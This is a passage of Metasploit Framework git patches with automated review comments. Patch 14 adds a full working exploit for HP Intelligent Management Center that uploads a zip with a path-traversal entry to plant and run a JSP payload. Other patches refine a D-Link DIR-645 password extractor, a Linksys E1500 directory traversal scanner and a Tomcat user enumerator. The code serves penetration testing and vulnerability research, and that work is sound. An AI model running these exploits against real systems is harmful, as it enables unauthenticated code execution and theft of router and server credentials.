'http', + :user => @user, + :pass => pass, + :source_type => "user_supplied", + :active => true + ) end end end From 98ac6e8090627a6b390b026e261423deffe69d00 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 24 Mar 2013 21:01:30 +0100 Subject: [PATCH 13/21] feedback included --- .../auxiliary/admin/http/dlink_dir_645_password_extractor.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index d70ddc1165..0c6c781e36 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb 
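Review bot: The rewritten loop in `run` carries the account name in the instance variable `@user` across iterations, so when a password line is not preceded by its own name line, the previously seen name (or nil for the first account) is paired with that password in `report_auth_info`. A local `user = nil` declared before `res.body.each_line`, and reset to nil after each report, keeps the pairing per account and avoids leaking parser state into the module instance. The enclosing method starts outside the hunk.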
@@ -56,7 +56,6 @@ class Metasploit3 < Msf::Auxiliary if res.body =~ /(.*)<\/password>/ print_good("#{rhost}:#{rport} - credentials successfully extracted") - #vprint_status("#{res.body}") #store all details as loot -> there is some usefull stuff in the response loot = store_loot("account_details.txt","text/plain",rhost, res.body) @@ -78,13 +77,11 @@ class Metasploit3 < Msf::Auxiliary :sname => 'http', :user => @user, :pass => pass, - :source_type => "user_supplied", :active => true ) end end end - rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return From 26b43d9ed2465b9707cbfb367ae879d47abf9b7b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 25 Mar 2013 00:54:30 +0100 Subject: [PATCH 14/21] Added module for ZDI-13-050 --- .../windows/http/hp_imc_mibfileupload.rb | 115 ++++++++++++++++++ 1 file changed, 115 insertions(+) create mode 100644 modules/exploits/windows/http/hp_imc_mibfileupload.rb diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb new file mode 100644 index 0000000000..f081025310 --- /dev/null +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb 
@@ -0,0 +1,115 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management Center Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in HP Intelligent Management Center. + The vulnerability exists in the mibFileUpload which is accepting unauthenticated + file uploads and handling zip contents in a insecure way. Combining both weaknesses + a remote attacker can accomplish arbitrary file upload. This module has been tested + successfully on HP Intelligent Management Center 5.1 E0202 on Windows 2003 SP2. 
+ }, + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-5201' ], + [ 'OSVDB', '91026' ], + [ 'BID', '58385' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-050/' ], + [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276' ] + ], + 'Privileged' => true, + 'Platform' => 'win', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'HP Intelligent Management Center 5.1 E0202 / Windows', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 07 2013')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']) + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"), + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + end + + def exploit + @peer = "#{rhost}:#{rport}" + + # New lines are handled and the payload goes corrupted + jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") + jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" + + # Zipping with CM_STORE to avoid errors while zip decompressing + # on the Java vulnerable application + zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) + zip.add_file("../../../../../../../ROOT/#{jsp_name}", jsp) + + post_data = Rex::MIME::Message.new + post_data.add_part(zip.pack, "application/octet-stream", nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"") + + # Work around an incompatible MIME implementation + data = post_data.to_s + data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") + + print_status("#{@peer} - Uploading the JSP payload...") + res = send_request_cgi({ + 'uri' => 
normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'cookie' => "JSESSIONID=#{Rex::Text.rand_text_hex(32)}" + }) + + if res and res.code == 200 and res.body.empty? + print_status("#{@peer} - JSP payload uploaded successfully") + register_files_for_cleanup(jsp_name) + else + fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP payload upload failed") + end + + print_status("#{@peer} - Executing payload...") + send_request_cgi({ + 'uri' => normalize_uri(jsp_name), + 'method' => 'GET' + }) + + end + +end From d54687cb37afbe3af5d92c3a01df9d0028fe358e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 25 Mar 2013 00:58:47 +0100 Subject: [PATCH 15/21] fix typo --- modules/exploits/windows/http/hp_imc_mibfileupload.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index f081025310..8d44ad8ee9 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote The vulnerability exists in the mibFileUpload which is accepting unauthenticated file uploads and handling zip contents in a insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This module has been tested - successfully on HP Intelligent Management Center 5.1 E0202 on Windows 2003 SP2. + successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. }, 'Author' => [ 
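Review bot: `register_files_for_cleanup(jsp_name)` in `exploit` registers only the bare file name, while the archive entry wrote the JSP to `../../../../../../../ROOT/#{jsp_name}` relative to wherever the upload handler extracts; unless the session's working directory is that ROOT directory (not established here), cleanup will not find and remove the dropped file. Consider registering the resolved path, or at least recording the assumption in a comment. The success test `res.code == 200 and res.body.empty?` is also weak evidence that the file landed, and the final GET of `jsp_name` ignores its response, so a failed upload only shows up as a missing session.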
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit @peer = "#{rhost}:#{rport}" - # New lines are handled and the payload goes corrupted + # New lines are handled on the vuln app and payload is corrupted jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" From ea804d433e380d5be4360cc52c82bd5392b379ec Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 25 Mar 2013 17:33:16 +0100 Subject: [PATCH 16/21] change file name --- .../http/{linksys_traversal.rb => linksys_e1500_traversal.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/http/{linksys_traversal.rb => linksys_e1500_traversal.rb} (100%) diff --git a/modules/auxiliary/scanner/http/linksys_traversal.rb b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb similarity index 100% rename from modules/auxiliary/scanner/http/linksys_traversal.rb rename to modules/auxiliary/scanner/http/linksys_e1500_traversal.rb From 53b862300eccf425fda56cd680848b882059dfc7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 25 Mar 2013 17:33:38 +0100 Subject: [PATCH 17/21] cleanup for linksys_e1500_traversal --- .../scanner/http/linksys_e1500_traversal.rb | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb index f370dc8a8d..4b8801578e 100644 --- a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb +++ b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb 
@@ -14,18 +14,18 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'Linksys Directory Traversal Vulnerability', + 'Name' => 'Linksys E1500 Directory Traversal Vulnerability', 'Description' => %q{ - This module exploits a directory traversal vulnerablity which is present in different - Linksys home routers like the E1500. - }, + This module exploits a directory traversal vulnerability which is present in + different Linksys home routers, like the E1500. + }, 'References' => [ [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ], [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ], [ 'BID', '57760' ], [ 'OSVDB', '89911' ], - [ 'EDB', '24475' ], + [ 'EDB', '24475' ] ], 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE @@ -58,8 +58,7 @@ class Metasploit3 < Msf::Auxiliary uri = "/apply.cgi" traversal = '../..' data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file - res = send_request_cgi( - { + res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'authorization' => basic_auth(user,pass), @@ -86,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary :method => "POST" }) - loot = store_loot("lfi.data","text/plain",rhost, res.body,file) + loot = store_loot("linksys.traversal.data","text/plain", rhost, res.body, file) vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") elsif (res and res.code) vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") @@ -105,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => '/', 'method' => 'GET', 'authorization' => basic_auth(user,pass) - }) + }) return if res.nil? return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/) 
@@ -124,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary end extract_words(datastore['SENSITIVE_FILES']).each do |file| - find_files(file,user,pass) unless file.empty? + find_files(file, user, pass) unless file.empty? end end end From 99fe2a33d7434cc055e6a593a57e885468f8138c Mon Sep 17 00:00:00 2001 From: Nathan Einwechter Date: Mon, 25 Mar 2013 12:35:52 -0400 Subject: [PATCH 18/21] Deregister USER_AS_PASS and stop on connect error --- modules/auxiliary/scanner/http/tomcat_enum.rb | 14 +++++++++++--- 1 file changed, 11 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 00204eb184..89af628a68 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary File.join(Msf::Config.install_root, "data", "wordlists", "tomcat_mgr_default_users.txt") ]), ], self.class) - deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME') + deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME') end def target_url @@ -56,12 +56,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) @users_found = {} + results = "" each_user_pass { |user,pass| - do_login(user) + results = do_login(user) + if results == "NetworkError" + break + end } - if(@users_found.empty?) + if results == "NetworkError" + print_error("#{target_url} - UNREACHABLE") + elsif(@users_found.empty?) print_status("#{target_url} - No users found.") else print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}") @@ -100,7 +106,9 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + return "NetworkError" rescue ::Timeout::Error, ::Errno::EPIPE + return "NetworkError" end end 
From 3f79b2fd3b399ebb2be187f9b4a4c2f42b0e5170 Mon Sep 17 00:00:00 2001 From: Nathan Einwechter Date: Mon, 25 Mar 2013 12:59:18 -0400 Subject: [PATCH 19/21] Use :abort for scanner mixin --- modules/auxiliary/scanner/http/tomcat_enum.rb | 19 ++++++------------- 1 file changed, 6 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 89af628a68..c650899cbd 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -56,18 +56,12 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) @users_found = {} - results = "" each_user_pass { |user,pass| - results = do_login(user) - if results == "NetworkError" - break - end + do_login(user) } - - if results == "NetworkError" - print_error("#{target_url} - UNREACHABLE") - elsif(@users_found.empty?) + + if(@users_found.empty?) print_status("#{target_url} - No users found.") else print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}") @@ -105,10 +99,9 @@ class Metasploit3 < Msf::Auxiliary return :abort end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - return "NetworkError" - rescue ::Timeout::Error, ::Errno::EPIPE - return "NetworkError" + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE + print_error("#{target_url} - UNREACHABLE") + return :abort end end From aad0eed48560270a729e4d41b593ba7ee1326ccf Mon Sep 17 00:00:00 2001 From: Nathan Einwechter Date: Mon, 25 Mar 2013 13:00:37 -0400 Subject: [PATCH 20/21] Fix whitespace EOL --- modules/auxiliary/scanner/http/tomcat_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index c650899cbd..40ddbfb8d7 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb 
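Review bot: After do_login returns :abort from the rescue branch, run_host still falls through to the `if(@users_found.empty?)` check and prints `No users found.` right after `UNREACHABLE`, so an unreachable host is reported twice with contradictory wording; the `results` variable that patch 18 used to tell the two cases apart is removed here without a replacement. A small flag keeps the scanner-mixin `:abort` protocol while restoring that distinction: set `@unreachable = true` immediately before `return :abort` in the rescue, and in run_host add `return if @unreachable` before the `@users_found.empty?` branch. Whether each_user_pass actually stops on `:abort` is not visible in this hunk; this assumes the AuthBrute mixin honours it, as the commit title implies. run_host's closing `end` is outside the hunk.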
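Review bot: The merged rescue list in do_login still omits `::Errno::ECONNRESET`, so a target that resets the connection mid-request would, as far as this hunk shows, raise out of do_login instead of reaching the `UNREACHABLE` path and the `:abort`. If that case is meant to be covered, `rescue ::Rex::ConnectionError, ::Timeout::Error, ::Errno::EPIPE, ::Errno::ECONNRESET` is shorter and, if Rex's hierarchy still has ConnectionRefused, HostUnreachable and ConnectionTimeout under ConnectionError, subsumes the three classes listed. The `begin` this rescue belongs to and the start of do_login are outside the hunk.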
+++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary each_user_pass { |user,pass| do_login(user) } - + if(@users_found.empty?) print_status("#{target_url} - No users found.") else From fdd06c923ae1ca7684c22ee5c316debc70df469e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 25 Mar 2013 18:04:12 +0100 Subject: [PATCH 21/21] cleanup for dlink_dir_645_password_extractor --- .../http/dlink_dir_645_password_extractor.rb | 29 ++++++++++--------- 1 file changed, 16 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index 0c6c781e36..0f98f7352d 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -16,19 +16,21 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'DLink DIR 645 Password Extractor', 'Description' => %q{ - This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. - With this vulnerability you are able to extract the password for the remote management. - }, + This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. + With this vulnerability you are able to extract the password for the remote + management. + }, 'References' => [ - [ 'URL', 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' ], + [ 'OSVDB', '90733' ], [ 'BID', '58231' ], - [ 'OSVDB', '90733' ] + [ 'URL', 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' ] + ], + 'Author' => + [ + 'Roberto Paleari ', # Vulnerability discovery + 'Michael Messner ' # Metasploit module ], - 'Author' => [ - 'Michael Messner ', #metasploit module - 'Roberto Paleari ' #vulnerability discovery - ], 'License' => MSF_LICENSE ) end 
@@ -45,8 +47,9 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/getcfg.php', 'method' => 'POST', - 'vars_post' => { - 'SERVICES' => 'DEVICE.ACCOUNT' + 'vars_post' => + { + 'SERVICES' => 'DEVICE.ACCOUNT' } }) @@ -58,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary print_good("#{rhost}:#{rport} - credentials successfully extracted") #store all details as loot -> there is some usefull stuff in the response - loot = store_loot("account_details.txt","text/plain",rhost, res.body) + loot = store_loot("dlink.dir645.config","text/plain",rhost, res.body) print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") res.body.each_line do |line| @@ -78,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary :user => @user, :pass => pass, :active => true - ) + ) end end end
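Review bot: The rewritten store_loot call in the `@@ -58,7 +61,7 @@` hunk mixes two spacing styles in one argument list, `"dlink.dir645.config","text/plain",rhost, res.body`; for a cleanup commit it should read `loot = store_loot("dlink.dir645.config", "text/plain", rhost, res.body)`. The same `res.body` is parsed for credentials a few lines further down, so this loot file is a plaintext account dump; an `info` argument such as `"DIR-645 DEVICE.ACCOUNT dump"` would make that visible in the loot listing, though whether store_loot accepts it in this framework version cannot be confirmed from the hunk. While touching this line, the adjacent context comment's `usefull` could be corrected to `useful`. The enclosing method starts and ends outside the hunk.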